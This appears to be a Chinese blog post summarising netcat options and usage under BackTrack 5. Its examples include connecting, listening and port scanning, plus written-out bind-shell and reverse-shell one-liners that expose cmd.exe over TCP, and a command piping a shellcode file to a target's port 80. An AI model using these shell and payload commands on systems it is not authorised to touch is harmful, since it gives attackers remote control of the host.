BT5 下 NC 的用法

最近在研究BT5 和Metasploit。

感覺以前使用的什麼暗組***工具包、黑防***工具包啊,全都是浮雲。有時候還得考慮用那些***是不是有後門。

剛用到NC,就打算把NC的命令做一下總結。

NC 一般來說包括兩種用法,一是主動連接到別的地方,另外一種是在本地進行監聽。命令格式如下:

useage:

connect to somwhere:    nc[-option] hostname ports[s]  [ports] ...

listen for inbound:          nc -l -p port [-option] [hostname] [port]

選項

options:

    -c shell commands    as `-e'; use /bin/sh to exec [dangerous!!]
    -e filename        program to exec after connect [dangerous!!]
    -b            allow broadcasts
    -g gateway        source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h            this cruft
    -i secs            delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
    -l            listen mode, for inbound connects
    -n            numeric-only IP addresses, no DNS
    -o file            hex dump of traffic
    -p port            local port number
    -r            randomize local and remote ports
    -q secs            quit after EOF on stdin and delay of secs
    -s addr            local source address
    -T tos            set Type Of Service
    -t            answer TELNET negotiation
    -u            UDP mode
    -v            verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z            zero-I/O mode [used for scanning]
 


想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
其中端口號可以指定一個或者用lo-hi式的指定範圍

 

 

NC常被用作***工具。主要用法如下

 

  1)連接到REMOTE主機,例子: 格式:nc -nvv 192.168.x.x 80 講解:連到192.168.x.x的TCP80端口

 

  2)監聽LOCAL主機,例子: 格式:nc -l -p 80 講解:監聽本機的TCP80端口

 

  3)掃描遠程主機,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 講解:掃描192.168.x.x的TCP80到TCP445的所有端口

 

  4)REMOTE主機綁定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口

 

  5)REMOTE主機綁定SHELL並反向連接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口 以上爲最基本的幾種用法(其實NC的用法還有很多, 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。

 

  高級用法:

 

  6)作***程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80講解:連接到192.168.x.x的80端口,並在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'爲shellcode等

 

  7)作蜜罐用[1],例子: 格式:nc -L -p 80 講解:使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止

 

  8)作蜜罐用[2],例子: 格式:nc -L -p 80>c:\log.txt 講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,同時把結果輸出到'c:\log.txt'中,如果把'& gt;' 改爲'>>'即可以追加日誌 附:'c:\log.txt'爲日誌等

 

  9)作蜜罐用[3],例子: 格式1:nc -L -p 80

 

  格式2:type.exe c:\honeypot.txt|nc -L -p 80 講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,並把'c:\honeypot.txt'的內容'送'入其 管道中

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章